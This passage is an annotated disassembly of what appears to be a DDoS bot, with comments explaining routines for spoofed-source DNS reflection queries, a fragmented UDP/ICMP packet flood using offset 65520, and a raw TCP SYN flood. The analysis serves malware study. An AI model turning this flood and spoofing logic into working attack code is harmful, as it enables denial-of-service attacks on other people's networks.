00 35 movw $0x3500,0x2(%ebx) set UDP size=UDP header size (8)+size of DNS query 80497ad: 66 8b 44 b5 dc mov 0xffffffdc(%ebp,%esi,4),%ax 80497b2: 66 83 c0 08 add $0x8,%ax 80497b6: 86 c4 xchg %al,%ah 80497b8: 66 89 43 04 mov %ax,0x4(%ebx) UDP crc = 0 80497bc: 66 c7 43 06 00 00 movw $0x0,0x6(%ebx) If given IP is 0.0.0.0, uses a random source IP 80497c2: 80 bd 9c f9 ff ff 00 cmpb $0x0,IP_src_0(%ebp) 80497c9: 75 71 jne 0x804983c 80497cb: 80 bd 98 f9 ff ff 00 cmpb $0x0,IP_src_1(%ebp) 80497d2: 75 68 jne 0x804983c 80497d4: 80 bd 94 f9 ff ff 00 cmpb $0x0,IP_src_2(%ebp) 80497db: 75 5f jne 0x804983c 80497dd: 80 bd 90 f9 ff ff 00 cmpb $0x0,IP_src_3(%ebp) 80497e4: 75 56 jne 0x804983c set random source IP 80497e6: e8 4d c6 00 00 call random 80497eb: 88 c2 mov %al,%dl 80497ed: 80 fa ff cmp $0xff,%dl 80497f0: 0f 93 c0 setae %al 80497f3: 00 c2 add %al,%dl 80497f5: 88 95 e4 f9 ff ff mov %dl,0xfffff9e4(%ebp) 80497fb: e8 38 c6 00 00 call random 8049800: 88 c2 mov %al,%dl 8049802: 80 fa ff cmp $0xff,%dl 8049805: 0f 93 c0 setae %al 8049808: 00 c2 add %al,%dl 804980a: 88 95 e5 f9 ff ff mov %dl,0xfffff9e5(%ebp) 8049810: e8 23 c6 00 00 call random 8049815: 88 c2 mov %al,%dl 8049817: 80 fa ff cmp $0xff,%dl 804981a: 0f 93 c0 setae %al 804981d: 00 c2 add %al,%dl 804981f: 88 95 e6 f9 ff ff mov %dl,0xfffff9e6(%ebp) 8049825: e8 0e c6 00 00 call random 804982a: 88 c2 mov %al,%dl 804982c: 80 fa ff cmp $0xff,%dl 804982f: 0f 93 c0 setae %al 8049832: 00 c2 add %al,%dl 8049834: 88 95 e7 f9 ff ff mov %dl,0xfffff9e7(%ebp) 804983a: eb 30 jmp 0x804986c otherwise set source IP 804983c: 8a 9d 9c f9 ff ff mov IP_src_0(%ebp),%bl 8049842: 88 9d e4 f9 ff ff mov %bl,0xfffff9e4(%ebp) 8049848: 8a 9d 98 f9 ff ff mov IP_src_1(%ebp),%bl 804984e: 88 9d e5 f9 ff ff mov %bl,0xfffff9e5(%ebp) 8049854: 8a 9d 94 f9 ff ff mov IP_src_2(%ebp),%bl 804985a: 88 9d e6 f9 ff ff mov %bl,0xfffff9e6(%ebp) 8049860: 8a 9d 90 f9 ff ff mov IP_src_3(%ebp),%bl 8049866: 88 9d e7 f9 ff ff mov %bl,0xfffff9e7(%ebp) set IP dst from given IP 804986c: 83 7d 34 00 cmpl $0x0,0x34(%ebp) // use IP dst ? 8049870: 75 30 jne 0x80498a2 8049872: 8a 9d ac f9 ff ff mov IP_dst_0(%ebp),%bl 8049878: 88 9d e8 f9 ff ff mov %bl,0xfffff9e8(%ebp) 804987e: 8a 9d a8 f9 ff ff mov IP_dst_1(%ebp),%bl 8049884: 88 9d e9 f9 ff ff mov %bl,0xfffff9e9(%ebp) 804988a: 8a 9d a4 f9 ff ff mov IP_dst_2(%ebp),%bl 8049890: 88 9d ea f9 ff ff mov %bl,0xfffff9ea(%ebp) 8049896: 8a 9d a0 f9 ff ff mov IP_dst_3(%ebp),%bl 804989c: 88 9d eb f9 ff ff mov %bl,0xfffff9eb(%ebp) IPv4, ip header=20 bytes 80498a2: c6 07 45 movb $0x45,(%edi) set TTL between 120 and 255 80498a5: e8 8e c5 00 00 call random 80498aa: bb 82 00 00 00 mov $0x82,%ebx 80498af: 99 cltd 80498b0: f7 fb idiv %ebx,%eax 80498b2: 80 c2 78 add $0x78,%dl 80498b5: 88 57 08 mov %dl,0x8(%edi) IP id=random 80498b8: e8 7b c5 00 00 call random 80498bd: bb ff 00 00 00 mov $0xff,%ebx 80498c2: 99 cltd 80498c3: f7 fb idiv %ebx,%eax 80498c5: 66 89 57 04 mov %dx,0x4(%edi) IP proto=0x11=UDP 80498c9: c6 47 09 11 movb $0x11,0x9(%edi) IP flag=0 80498cd: 66 c7 47 06 00 00 movw $0x0,0x6(%edi) IP len=dns+ip header(20)+udp header(8) 80498d3: 66 8b 44 b5 dc mov 0xffffffdc(%ebp,%esi,4),%ax 80498d8: 66 83 c0 1c add $0x1c,%ax 80498dc: 86 c4 xchg %al,%ah 80498de: 66 89 47 02 mov %ax,0x2(%edi) Calculate IP crc Initialise stored IP crc to 0 80498e2: 66 c7 47 0a 00 00 movw $0x0,0xa(%edi) 80498e8: ba 14 00 00 00 mov $0x14,%edx 80498ed: 8d 9d d8 f9 ff ff lea 0xfffff9d8(%ebp),%ebx 80498f3: 89 9d 74 f9 ff ff mov %ebx,0xfffff974(%ebp) 80498f9: 31 c9 xor %ecx,%ecx Initialise calculated IP crc to 0 80498fb: 66 c7 85 b2 f9 ff ff movw $0x0,0xfffff9b2(%ebp) 8049902: 00 00 8049904: 8b 9d 74 f9 ff ff mov 0xfffff974(%ebp),%ebx 804990a: 0f b7 03 movzwl (%ebx),%eax 804990d: 01 c1 add %eax,%ecx 804990f: 83 c3 02 add $0x2,%ebx 8049912: 89 9d 74 f9 ff ff mov %ebx,0xfffff974(%ebp) 8049918: 83 c2 fe add $0xfffffffe,%edx 804991b: 83 fa 01 cmp $0x1,%edx 804991e: 7f e4 jg 0x8049904 8049920: 75 11 jne 0x8049933 8049922: 8a 03 mov (%ebx),%al 8049924: 88 85 b2 f9 ff ff mov %al,0xfffff9b2(%ebp) 804992a: 0f b7 85 b2 f9 ff ff movzwl 0xfffff9b2(%ebp),%eax 8049931: 01 c1 add %eax,%ecx 8049933: 89 ca mov %ecx,%edx 8049935: c1 fa 10 sar $0x10,%edx 8049938: 0f b7 c1 movzwl %cx,%eax 804993b: 8d 0c 10 lea (%eax,%edx,1),%ecx 804993e: 89 c8 mov %ecx,%eax 8049940: c1 f8 10 sar $0x10,%eax 8049943: 01 c1 add %eax,%ecx 8049945: 89 c8 mov %ecx,%eax 8049947: 66 f7 d0 not %ax Save the crc 804994a: 66 89 85 b2 f9 ff ff mov %ax,0xfffff9b2(%ebp) 8049951: 66 89 47 0a mov %ax,0xa(%edi) Send the DNS request 8049955: 6a 10 push $0x10 // len 8049957: 8d 85 d8 fd ff ff lea 0xfffffdd8(%ebp),%eax // to 804995d: 50 push %eax 804995e: 6a 00 push $0x0 // flag 8049960: 8b 44 b5 dc mov 0xffffffdc(%ebp,%esi,4),%eax 8049964: 83 c0 1c add $0x1c,%eax 8049967: 50 push %eax 8049968: 8d 85 d8 f9 ff ff lea 0xfffff9d8(%ebp),%eax // IP 804996e: 50 push %eax 804996f: 8b 9d 8c f9 ff ff mov socket(%ebp),%ebx 8049975: 53 push %ebx 8049976: e8 c1 d2 00 00 call sendto 804997b: 83 c4 18 add $0x18,%esp 804997e: 83 7d 28 00 cmpl $0x0,0x28(%ebp) 8049982: 75 0c jne 0x8049990 8049984: 68 2c 01 00 00 push $0x12c 8049989: e8 22 bc 00 00 call feof 804998e: eb 1f jmp 0x80499af 8049990: 8b 5d 28 mov 0x28(%ebp),%ebx 8049993: 39 9d 80 f9 ff ff cmp %ebx,cpt(%ebp) 8049999: 75 21 jne 0x80499bc 804999b: 68 2c 01 00 00 push $0x12c 80499a0: e8 0b bc 00 00 call feof 80499a5: c7 85 80 f9 ff ff 00 movl $0x0,cpt(%ebp) 80499ac: 00 00 00 80499af: ff 8d 7c f9 ff ff decl 0xfffff97c(%ebp) 80499b5: 83 c4 04 add $0x4,%esp 80499b8: eb 08 jmp 0x80499c2 80499ba: 8d 36 lea (%esi),%esi 80499bc: ff 85 80 f9 ff ff incl cpt(%ebp) No more IP, restart with next DNS request 80499c2: 83 85 78 f9 ff ff 32 addl $0x32,0xfffff978(%ebp) 80499c9: 46 inc %esi 80499ca: 83 fe 08 cmp $0x8,%esi 80499cd: 0f 8e 35 fd ff ff jle 0x8049708 end of while(1) 80499d3: e9 bc fc ff ff jmp 0x8049694 pid=0; return 0; 80499d8: c7 05 74 e7 07 08 00 movl $0x0,pid 80499df: 00 00 00 80499e2: 31 c0 xor %eax,%eax 80499e4: 8d a5 68 f9 ff ff lea 0xfffff968(%ebp),%esp 80499ea: 5b pop %ebx 80499eb: 5e pop %esi 80499ec: 5f pop %edi 80499ed: 89 ec mov %ebp,%esp 80499ef: 5d pop %ebp 80499f0: c3 ret 80499f1: 8d 76 00 lea 0x0(%esi),%esi
It may be more powerfull to use a random fragmentation offset instead of a hard coded offset. It's a bit strange to fill the UDP or ICMP structure...
/* 0x8 =0 ICMP !=0 UDP 0xc port UDP dst 0x10 0x14 0x18 0x1C IP dst 0x20 0x24 0x28 0x2C IP src 0x30 use name ? 0x34 name dst */ 80499f4: 55 push %ebp 80499f5: 89 e5 mov %esp,%ebp 80499f7: 81 ec a0 00 00 00 sub $0xa0,%esp 80499fd: 57 push %edi 80499fe: 56 push %esi 80499ff: 53 push %ebx Copy IP dst argument 8049a00: 8a 4d 10 mov 0x10(%ebp),%cl 8049a03: 88 4d 84 mov %cl,0xffffff84(%ebp) 8049a06: 8a 4d 14 mov 0x14(%ebp),%cl 8049a09: 88 4d 80 mov %cl,0xffffff80(%ebp) 8049a0c: 8a 4d 18 mov 0x18(%ebp),%cl 8049a0f: 88 8d 7c ff ff ff mov %cl,0xffffff7c(%ebp) 8049a15: 8a 4d 1c mov 0x1c(%ebp),%cl 8049a18: 88 8d 78 ff ff ff mov %cl,0xffffff78(%ebp) Copy IP src argument 8049a1e: 8a 4d 20 mov 0x20(%ebp),%cl 8049a21: 88 8d 74 ff ff ff mov %cl,0xffffff74(%ebp) 8049a27: 8a 4d 24 mov 0x24(%ebp),%cl 8049a2a: 88 8d 70 ff ff ff mov %cl,0xffffff70(%ebp) 8049a30: 8a 4d 28 mov 0x28(%ebp),%cl 8049a33: 88 8d 6c ff ff ff mov %cl,0xffffff6c(%ebp) 8049a39: 8a 5d 2c mov 0x2c(%ebp),%bl init data 8049a3c: 66 c7 45 f0 02 00 movw $0x2,0xfffffff0(%ebp) // AF_INET random IP dst 8049a42: e8 f1 c3 00 00 call random 8049a47: b9 ff 00 00 00 mov $0xff,%ecx 8049a4c: 99 cltd 8049a4d: f7 f9 idiv %ecx,%eax 8049a4f: 89 d0 mov %edx,%eax 8049a51: 86 c4 xchg %al,%ah 8049a53: 66 89 45 f2 mov %ax,0xfffffff2(%ebp) IP src 8049a57: 0f b6 c3 movzbl %bl,%eax 8049a5a: 50 push %eax 8049a5b: 0f b6 85 6c ff ff ff movzbl 0xffffff6c(%ebp),%eax 8049a62: 50 push %eax 8049a63: 0f b6 85 70 ff ff ff movzbl 0xffffff70(%ebp),%eax 8049a6a: 50 push %eax 8049a6b: 0f b6 85 74 ff ff ff movzbl 0xffffff74(%ebp),%eax 8049a72: 50 push %eax 8049a73: 68 8a 76 06 08 push $format_ip 8049a78: 8d 75 90 lea 0xffffff90(%ebp),%esi 8049a7b: 56 push %esi 8049a7c: e8 87 5d 00 00 call sprintf 8049a81: 83 c4 18 add $0x18,%esp use name ? 8049a84: 83 7d 30 00 cmpl $0x0,0x30(%ebp) 8049a88: 75 34 jne 0x8049abe set destination IP 8049a8a: 0f b6 85 78 ff ff ff movzbl 0xffffff78(%ebp),%eax 8049a91: 50 push %eax 8049a92: 0f b6 85 7c ff ff ff movzbl 0xffffff7c(%ebp),%eax 8049a99: 50 push %eax 8049a9a: 0f b6 45 80 movzbl 0xffffff80(%ebp),%eax 8049a9e: 50 push %eax 8049a9f: 0f b6 45 84 movzbl 0xffffff84(%ebp),%eax 8049aa3: 50 push %eax 8049aa4: 68 8a 76 06 08 push $format_ip 8049aa9: 8d 5d b0 lea 0xffffffb0(%ebp),%ebx 8049aac: 53 push %ebx 8049aad: e8 56 5d 00 00 call sprintf 8049ab2: 53 push %ebx 8049ab3: e8 d4 33 00 00 call inet_addr 8049ab8: 89 45 f4 mov %eax,0xfffffff4(%ebp) 8049abb: 83 c4 1c add $0x1c,%esp get a RAW socket 8049abe: 68 ff 00 00 00 push $0xff 8049ac3: 6a 03 push $0x3 SOCK_RAW 8049ac5: 6a 02 push $0x2 INET 8049ac7: e8 28 d2 00 00 call socket 8049acc: 89 85 68 ff ff ff mov %eax,socket(%ebp) 8049ad2: 83 c4 0c add $0xc,%esp 8049ad5: 85 c0 test %eax,%eax 8049ad7: 0f 8e 47 02 00 00 jle 0x8049d24 IPv4, ip header=20 bytes 8049add: c6 45 d0 45 movb $0x45,0xffffffd0(%ebp) // IP set IP length 8049ae1: 66 c7 45 d2 28 1c movw $0x1c28,0xffffffd2(%ebp) set IP id 8049ae7: 66 c7 45 d4 04 55 movw $0x5504,0xffffffd4(%ebp) set TTL between 120 and 255 8049aed: e8 46 c3 00 00 call random 8049af2: b9 82 00 00 00 mov $0x82,%ecx 8049af7: 99 cltd 8049af8: f7 f9 idiv %ecx,%eax 8049afa: 80 c2 78 add $0x78,%dl 8049afd: 88 55 d8 mov %dl,0xffffffd8(%ebp) set IP src 8049b00: 56 push %esi 8049b01: e8 86 33 00 00 call inet_addr 8049b06: 89 45 dc mov %eax,0xffffffdc(%ebp) 8049b09: 83 c4 04 add $0x4,%esp set IP dst 8049b0c: 83 7d 30 00 cmpl $0x0,0x30(%ebp) 8049b10: 75 0f jne 0x8049b21 8049b12: 8d 45 b0 lea 0xffffffb0(%ebp),%eax 8049b15: 50 push %eax 8049b16: e8 71 33 00 00 call inet_addr 8049b1b: 89 45 e0 mov %eax,0xffffffe0(%ebp) 8049b1e: 83 c4 04 add $0x4,%esp IP offset=65520 8049b21: 66 c7 45 d6 1f fe movw $0xfe1f,0xffffffd6(%ebp) IP crc=0 8049b27: 66 c7 45 da 00 00 movw $0x0,0xffffffda(%ebp) 8049b2d: 83 7d 08 00 cmpl $0x0,0x8(%ebp) 8049b31: 74 7d je 0x8049bb0 // autre posibilite IP proto=0x11=UDP 8049b33: c6 45 d9 11 movb $0x11,0xffffffd9(%ebp) random UDP source port 8049b37: e8 fc c2 00 00 call random 8049b3c: b9 ff 00 00 00 mov $0xff,%ecx 8049b41: 99 cltd 8049b42: f7 f9 idiv %ecx,%eax 8049b44: 89 d0 mov %edx,%eax 8049b46: 86 c4 xchg %al,%ah 8049b48: 66 89 45 e4 mov %ax,0xffffffe4(%ebp) set UDP destination port 8049b4c: 66 8b 45 0c mov 0xc(%ebp),%ax 8049b50: 86 c4 xchg %al,%ah 8049b52: 66 89 45 e6 mov %ax,0xffffffe6(%ebp) set UDP data length 8049b56: 66 c7 45 e8 00 09 movw $0x900,0xffffffe8(%ebp) Calculate IP crc 8049b5c: ba 09 00 00 00 mov $0x9,%edx 8049b61: 8d 75 e4 lea 0xffffffe4(%ebp),%esi 8049b64: 31 db xor %ebx,%ebx 8049b66: 66 c7 45 8e 00 00 movw $0x0,0xffffff8e(%ebp) 8049b6c: 0f b7 06 movzwl (%esi),%eax 8049b6f: 01 c3 add %eax,%ebx 8049b71: 83 c6 02 add $0x2,%esi 8049b74: 83 c2 fe add $0xfffffffe,%edx 8049b77: 83 fa 01 cmp $0x1,%edx 8049b7a: 7f f0 jg 0x8049b6c 8049b7c: 75 0b jne 0x8049b89 8049b7e: 8a 06 mov (%esi),%al 8049b80: 88 45 8e mov %al,0xffffff8e(%ebp) 8049b83: 0f b7 45 8e movzwl 0xffffff8e(%ebp),%eax 8049b87: 01 c3 add %eax,%ebx 8049b89: 89 da mov %ebx,%edx 8049b8b: c1 fa 10 sar $0x10,%edx 8049b8e: 0f b7 c3 movzwl %bx,%eax 8049b91: 8d 1c 10 lea (%eax,%edx,1),%ebx 8049b94: 89 d8 mov %ebx,%eax 8049b96: c1 f8 10 sar $0x10,%eax 8049b99: 01 c3 add %eax,%ebx 8049b9b: 89 d8 mov %ebx,%eax 8049b9d: 66 f7 d0 not %ax Save the crc 8049ba0: 66 89 45 8e mov %ax,0xffffff8e(%ebp) 8049ba4: 66 89 45 ea mov %ax,0xffffffea(%ebp) Put data 8049ba8: c6 45 ec 61 movb $0x61,0xffffffec(%ebp) end of while(1) 8049bac: eb 62 jmp 0x8049c10 8049bae: 8d 36 lea (%esi),%esi autre_possibilite: IP proto=0x1=ICMP 8049bb0: c6 45 d9 01 movb $0x1,0xffffffd9(%ebp) type=ping, code=0, crc=0 (it will be true if offset was 0) 8049bb4: c6 45 e4 08 movb $0x8,0xffffffe4(%ebp) 8049bb8: c6 45 e5 00 movb $0x0,0xffffffe5(%ebp) 8049bbc: 66 c7 45 e6 00 00 movw $0x0,0xffffffe6(%ebp) Calculate ICMP crc 8049bc2: ba 09 00 00 00 mov $0x9,%edx 8049bc7: 8d 75 e4 lea 0xffffffe4(%ebp),%esi 8049bca: 31 db xor %ebx,%ebx 8049bcc: 66 c7 45 8e 00 00 movw $0x0,0xffffff8e(%ebp) 8049bd2: 8d 36 lea (%esi),%esi 8049bd4: 0f b7 06 movzwl (%esi),%eax 8049bd7: 01 c3 add %eax,%ebx 8049bd9: 83 c6 02 add $0x2,%esi 8049bdc: 83 c2 fe add $0xfffffffe,%edx 8049bdf: 83 fa 01 cmp $0x1,%edx 8049be2: 7f f0 jg 0x8049bd4 8049be4: 75 0b jne 0x8049bf1 8049be6: 8a 06 mov (%esi),%al 8049be8: 88 45 8e mov %al,0xffffff8e(%ebp) 8049beb: 0f b7 45 8e movzwl 0xffffff8e(%ebp),%eax 8049bef: 01 c3 add %eax,%ebx 8049bf1: 89 da mov %ebx,%edx 8049bf3: c1 fa 10 sar $0x10,%edx 8049bf6: 0f b7 c3 movzwl %bx,%eax 8049bf9: 8d 1c 10 lea (%eax,%edx,1),%ebx 8049bfc: 89 d8 mov %ebx,%eax 8049bfe: c1 f8 10 sar $0x10,%eax 8049c01: 01 c3 add %eax,%ebx 8049c03: 89 d8 mov %ebx,%eax 8049c05: 66 f7 d0 not %ax Save the crc 8049c08: 66 89 45 8e mov %ax,0xffffff8e(%ebp) 8049c0c: 66 89 45 e6 mov %ax,0xffffffe6(%ebp) 8049c10: c7 85 64 ff ff ff 1d movl $0x1d,0xffffff64(%ebp) 8049c17: 00 00 00 Calculate IP crc 8049c1a: ba 14 00 00 00 mov $0x14,%edx 8049c1f: 8d 75 d0 lea 0xffffffd0(%ebp),%esi // IP 8049c22: 31 db xor %ebx,%ebx 8049c24: 66 c7 45 8e 00 00 movw $0x0,0xffffff8e(%ebp) 8049c2a: 8d 36 lea (%esi),%esi 8049c2c: 0f b7 06 movzwl (%esi),%eax 8049c2f: 01 c3 add %eax,%ebx 8049c31: 83 c6 02 add $0x2,%esi 8049c34: 83 c2 fe add $0xfffffffe,%edx 8049c37: 83 fa 01 cmp $0x1,%edx 8049c3a: 7f f0 jg 0x8049c2c 8049c3c: 75 0b jne 0x8049c49 8049c3e: 8a 06 mov (%esi),%al 8049c40: 88 45 8e mov %al,0xffffff8e(%ebp) 8049c43: 0f b7 45 8e movzwl 0xffffff8e(%ebp),%eax 8049c47: 01 c3 add %eax,%ebx 8049c49: 89 da mov %ebx,%edx 8049c4b: c1 fa 10 sar $0x10,%edx 8049c4e: 0f b7 c3 movzwl %bx,%eax 8049c51: 8d 1c 10 lea (%eax,%edx,1),%ebx 8049c54: 89 d8 mov %ebx,%eax 8049c56: c1 f8 10 sar $0x10,%eax 8049c59: 01 c3 add %eax,%ebx 8049c5b: 89 d8 mov %ebx,%eax 8049c5d: 66 f7 d0 not %ax Save the crc 8049c60: 66 89 45 8e mov %ax,0xffffff8e(%ebp) 8049c64: 66 89 45 da mov %ax,0xffffffda(%ebp) 8049c68: 31 db xor %ebx,%ebx 8049c6a: 8d 4d f0 lea 0xfffffff0(%ebp),%ecx 8049c6d: 89 8d 60 ff ff ff mov %ecx,0xffffff60(%ebp) 8049c73: 8d 7d d0 lea 0xffffffd0(%ebp),%edi //IP 8049c76: 8d 36 lea (%esi),%esi 8049c78: 31 f6 xor %esi,%esi use name ? 8049c7a: 83 7d 30 00 cmpl $0x0,0x30(%ebp) 8049c7e: 74 4e je 0x8049cce 8049c80: 85 db test %ebx,%ebx 8049c82: 7f 4a jg 0x8049cce 8049c84: 8b 4d 34 mov 0x34(%ebp),%ecx 8049c87: 51 push %ecx 8049c88: e8 f3 22 00 00 call get_host_by_name 8049c8d: 89 c2 mov %eax,%edx 8049c8f: 83 c4 04 add $0x4,%esp 8049c92: 85 d2 test %edx,%edx 8049c94: 75 16 jne 0x8049cac 8049c96: 68 58 02 00 00 push $0x258 8049c9b: e8 2c ba 00 00 call seterrno_cx 8049ca0: be 01 00 00 00 mov $0x1,%esi 8049ca5: 83 c4 04 add $0x4,%esp 8049ca8: eb 24 jmp 0x8049cce 8049caa: 8d 36 lea (%esi),%esi 8049cac: 6a 04 push $0x4 8049cae: 8d 45 88 lea 0xffffff88(%ebp),%eax 8049cb1: 50 push %eax 8049cb2: 8b 42 10 mov 0x10(%edx),%eax 8049cb5: 8b 00 mov (%eax),%eax 8049cb7: 50 push %eax 8049cb8: e8 c3 c7 00 00 call bcopy 8049cbd: 8b 45 88 mov 0xffffff88(%ebp),%eax 8049cc0: 89 45 e0 mov %eax,0xffffffe0(%ebp) 8049cc3: 89 45 f4 mov %eax,0xfffffff4(%ebp) 8049cc6: bb 40 9c 00 00 mov $0x9c40,%ebx 8049ccb: 83 c4 0c add $0xc,%esp 8049cce: 85 f6 test %esi,%esi 8049cd0: 75 4b jne 0x8049d1d Send the packet twice 8049cd2: 6a 10 push $0x10 8049cd4: 8b 8d 60 ff ff ff mov 0xffffff60(%ebp),%ecx 8049cda: 51 push %ecx 8049cdb: 6a 00 push $0x0 8049cdd: 8b 8d 64 ff ff ff mov 0xffffff64(%ebp),%ecx 8049ce3: 51 push %ecx 8049ce4: 57 push %edi 8049ce5: 8b 8d 68 ff ff ff mov socket(%ebp),%ecx 8049ceb: 51 push %ecx 8049cec: e8 4b cf 00 00 call sendto 8049cf1: 6a 10 push $0x10 8049cf3: 8b 8d 60 ff ff ff mov 0xffffff60(%ebp),%ecx 8049cf9: 51 push %ecx 8049cfa: 6a 00 push $0x0 8049cfc: 8b 8d 64 ff ff ff mov 0xffffff64(%ebp),%ecx 8049d02: 51 push %ecx 8049d03: 57 push %edi 8049d04: 8b 8d 68 ff ff ff mov socket(%ebp),%ecx 8049d0a: 51 push %ecx 8049d0b: e8 2c cf 00 00 call sendto 8049d10: 83 c4 30 add $0x30,%esp 8049d13: 6a 14 push $0x14 8049d15: e8 96 b8 00 00 call feof 8049d1a: 83 c4 04 add $0x4,%esp 8049d1d: 4b dec %ebx end of while(1) 8049d1e: e9 55 ff ff ff jmp 0x8049c78 8049d23: 90 nop pid=0; return 0; 8049d24: c7 05 74 e7 07 08 00 movl $0x0,pid 8049d2b: 00 00 00 8049d2e: 31 c0 xor %eax,%eax 8049d30: 8d a5 54 ff ff ff lea 0xffffff54(%ebp),%esp 8049d36: 5b pop %ebx 8049d37: 5e pop %esi 8049d38: 5f pop %edi 8049d39: 89 ec mov %ebp,%esp 8049d3b: 5d pop %ebp 8049d3c: c3 ret 8049d3d: 8d 76 00 lea 0x0(%esi),%esi
/* 0x8 0xc 0x10 0x14 IP dst 0x18 0x1c TCP port dst 0x20 !=0 use IP src 0x24 0x28 0x2c 0x30 IP src 0x34 cpt 0x38 !=0 use name dst 0x3c name dst /* 8049d40: 55 push %ebp 8049d41: 89 e5 mov %esp,%ebp 8049d43: 81 ec cc 00 00 00 sub $0xcc,%esp 8049d49: 57 push %edi 8049d4a: 56 push %esi 8049d4b: 53 push %ebx Copy IP dst argument 8049d4c: 8a 5d 08 mov 0x8(%ebp),%bl 8049d4f: 88 9d 5c ff ff ff mov %bl,0xffffff5c(%ebp) 8049d55: 8a 5d 0c mov 0xc(%ebp),%bl 8049d58: 88 9d 58 ff ff ff mov %bl,0xffffff58(%ebp) 8049d5e: 8a 5d 10 mov 0x10(%ebp),%bl 8049d61: 88 9d 54 ff ff ff mov %bl,0xffffff54(%ebp) 8049d67: 8a 5d 14 mov 0x14(%ebp),%bl 8049d6a: 88 9d 38 ff ff ff mov %bl,0xffffff38(%ebp) Copy IP src argument 8049d70: 8a 5d 24 mov 0x24(%ebp),%bl 8049d73: 88 9d 50 ff ff ff mov %bl,0xffffff50(%ebp) 8049d79: 8a 5d 28 mov 0x28(%ebp),%bl 8049d7c: 88 9d 4c ff ff ff mov %bl,0xffffff4c(%ebp) 8049d82: 8a 5d 2c mov 0x2c(%ebp),%bl 8049d85: 88 9d 48 ff ff ff mov %bl,0xffffff48(%ebp) 8049d8b: 8a 5d 30 mov 0x30(%ebp),%bl 8049d8e: 88 9d 44 ff ff ff mov %bl,0xffffff44(%ebp) 8049d94: 83 7d 34 00 cmpl $0x0,0x34(%ebp) 8049d98: 74 03 je 0x8049d9d 8049d9a: ff 4d 34 decl 0x34(%ebp) 8049d9d: 6a 00 push $0x0 8049d9f: e8 a0 d6 00 00 call time 8049da4: 83 c4 04 add $0x4,%esp 8049da7: 50 push %eax 8049da8: e8 f3 bb 00 00 call srandom 8049dad: 83 c4 04 add $0x4,%esp init data 8049db0: 66 c7 45 f0 02 00 movw $0x2,0xfffffff0(%ebp) // AF_INET random IP dst 8049db6: e8 7d c0 00 00 call random 8049dbb: bb ff 00 00 00 mov $0xff,%ebx 8049dc0: 99 cltd 8049dc1: f7 fb idiv %ebx,%eax 8049dc3: 89 d0 mov %edx,%eax 8049dc5: 86 c4 xchg %al,%ah 8049dc7: 66 89 45 f2 mov %ax,0xfffffff2(%ebp) set IP dst if no name is specified 8049dcb: 83 7d 38 00 cmpl $0x0,0x38(%ebp) 8049dcf: 75 3a jne 0x8049e0b 8049dd1: 0f b6 85 38 ff ff ff movzbl 0xffffff38(%ebp),%eax 8049dd8: 50 push %eax 8049dd9: 0f b6 85 54 ff ff ff movzbl 0xffffff54(%ebp),%eax 8049de0: 50 push %eax 8049de1: 0f b6 85 58 ff ff ff movzbl 0xffffff58(%ebp),%eax 8049de8: 50 push %eax 8049de9: 0f b6 85 5c ff ff ff movzbl 0xffffff5c(%ebp),%eax 8049df0: 50 push %eax 8049df1: 68 8a 76 06 08 push $format_ip 8049df6: 8d 5d 88 lea 0xffffff88(%ebp),%ebx 8049df9: 53 push %ebx 8049dfa: e8 09 5a 00 00 call sprintf 8049dff: 53 push %ebx 8049e00: e8 87 30 00 00 call inet_addr 8049e05: 89 45 f4 mov %eax,0xfffffff4(%ebp) 8049e08: 83 c4 1c add $0x1c,%esp IPv4, ip header=20 bytes 8049e0b: c6 45 c8 45 movb $0x45,0xffffffc8(%ebp) set IP length 8049e0f: 66 c7 45 ca 00 28 movw $0x2800,0xffffffca(%ebp) IP ecn=0, dscp=0 8049e15: c6 45 c9 00 movb $0x0,0xffffffc9(%ebp) get a RAW socket 8049e19: 68 ff 00 00 00 push $0xff 8049e1e: 6a 03 push $0x3 SOCK_RAW 8049e20: 6a 02 push $0x2 INET 8049e22: e8 cd ce 00 00 call socket 8049e27: 89 85 40 ff ff ff mov %eax,0xffffff40(%ebp) // socket 8049e2d: 83 c4 0c add $0xc,%esp 8049e30: 85 c0 test %eax,%eax 8049e32: 0f 8e 40 03 00 00 jle 0x804a178 set IP src if any 8049e38: 83 7d 20 00 cmpl $0x0,0x20(%ebp) 8049e3c: 74 34 je 0x8049e72 8049e3e: 0f b6 85 44 ff ff ff movzbl 0xffffff44(%ebp),%eax 8049e45: 50 push %eax 8049e46: 0f b6 85 48 ff ff ff movzbl 0xffffff48(%ebp),%eax 8049e4d: 50 push %eax 8049e4e: 0f b6 85 4c ff ff ff movzbl 0xffffff4c(%ebp),%eax 8049e55: 50 push %eax 8049e56: 0f b6 85 50 ff ff ff movzbl 0xffffff50(%ebp),%eax 8049e5d: 50 push %eax 8049e5e: 68 8a 76 06 08 push $format_ip 8049e63: 8d 85 68 ff ff ff lea 0xffffff68(%ebp),%eax 8049e69: 50 push %eax 8049e6a: e8 99 59 00 00 call sprintf 8049e6f: 83 c4 18 add $0x18,%esp set IP dst if no name is specified 8049e72: 83 7d 38 00 cmpl $0x0,0x38(%ebp) 8049e76: 75 0f jne 0x8049e87 8049e78: 8d 45 88 lea 0xffffff88(%ebp),%eax 8049e7b: 50 push %eax 8049e7c: e8 0b 30 00 00 call inet_addr 8049e81: 89 45 d8 mov %eax,0xffffffd8(%ebp) 8049e84: 83 c4 04 add $0x4,%esp frag=0 8049e87: 66 c7 45 ce 00 00 movw $0x0,0xffffffce(%ebp) IP proto=0x6=TCP 8049e8d: c6 45 d1 06 movb $0x6,0xffffffd1(%ebp) TCP flags mask (foro nothing, see next) 8049e91: 8a 45 e9 mov 0xffffffe9(%ebp),%al 8049e94: 24 ef and $0xef,%al 8049e96: 88 45 e9 mov %al,0xffffffe9(%ebp) TCP hdr len 8049e99: 8a 45 e8 mov 0xffffffe8(%ebp),%al 8049e9c: 24 0f and $0xf,%al 8049e9e: 0c 50 or $0x50,%al 8049ea0: 88 45 e8 mov %al,0xffffffe8(%ebp) 8049ea3: c7 45 e4 00 00 00 00 movl $0x0,0xffffffe4(%ebp) 8049eaa: 24 50 and $0x50,%al 8049eac: 88 45 e8 mov %al,0xffffffe8(%ebp) TCP flags=SYN 8049eaf: c6 45 e9 02 movb $0x2,0xffffffe9(%ebp) TCP crc=0 8049eb3: 66 c7 45 ee 00 00 movw $0x0,0xffffffee(%ebp) TCP port dst 8049eb9: 8b 45 18 mov 0x18(%ebp),%eax 8049ebc: c1 e0 08 shl $0x8,%eax 8049ebf: 66 03 45 1c add 0x1c(%ebp),%ax 8049ec3: 86 c4 xchg %al,%ah 8049ec5: 66 89 45 de mov %ax,0xffffffde(%ebp) 8049ec9: 31 ff xor 